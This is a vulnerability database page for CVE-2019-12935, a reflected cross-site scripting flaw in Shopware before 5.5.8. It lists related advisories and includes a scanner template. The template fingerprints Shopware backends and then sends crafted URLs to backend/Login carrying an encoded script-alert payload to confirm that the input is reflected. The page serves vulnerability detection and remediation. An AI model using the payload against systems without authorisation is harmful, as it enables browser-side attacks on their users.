Vulners
Lucene search
Shopware < 5.5.8 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2019-12935 | 15 Jan 202607:49 | – | circl |
 | CVE-2019-12935 | 23 Jun 201922:23 | – | cve |
 | CVE-2019-12935 | 23 Jun 201922:23 | – | cvelist |
 | EUVD-2022-3219 | 3 Oct 202520:07 | – | euvd |
 | Shopware Cross-site Scripting Vulnerability | 24 May 202222:00 | – | github |
 | CVE-2019-12935 | 23 Jun 201923:15 | – | nvd |
 | CVE-2019-12935 | 23 Jun 201923:15 | – | osv |
| GHSA-8QXH-HCR9-2379 Shopware Cross-site Scripting Vulnerability | 24 May 202222:00 | – | osv |
 | Design/Logic Flaw | 23 Jun 201923:15 | – | prion |
 | CVE-2019-12935 | 5 Feb 202518:07 | – | redhatcve |
10
id: CVE-2019-12935
info:
name: Shopware < 5.5.8 - Cross-Site Scripting
author: pussycat0x
severity: high
description: |
Shopware before 5.5.8 contains a reflected cross-site scripting (XSS) caused by unsanitized query string parameters in the backend/Login or backend/Login/load/ URI, letting attackers execute arbitrary scripts in the context of the victim's browser, exploit requires sending crafted URL to the victim.
impact: |
Attackers can execute malicious scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Update to version 5.5.8 or later.
reference:
- https://www.miggo.io/vulnerability-database/cve/CVE-2019-12935
- https://nvd.nist.gov/vuln/detail/CVE-2019-12935
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
cvss-score: 7.4
cve-id: CVE-2019-12935
epss-score: 0.02734
epss-percentile: 0.84261
cwe-id: CWE-79
metadata:
verified: false
max-request: 2
tags: cve,cve2019,shopware,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body, 'Realisiert mit Shopware','Realised with Shopware','Shopware Administration (c) shopware AG','<title>Shopware 5 - Backend (c) shopware AG</title>','Shopware.Application.start')"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: status
status:
- 200
- 401
condition: or
# digest: 490a0046304402202bc560e9e3ea6999b81e8eb173f915c97e785dd98d3896c16261c79fa1d5b58202207a8d3ccc2071f86ba77f96ae872ab0f1f5c1bc7afb6bf2a3920c84f2a2af9b6f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 24.3
CVSS 36.1 - 7.4
EPSS0.02734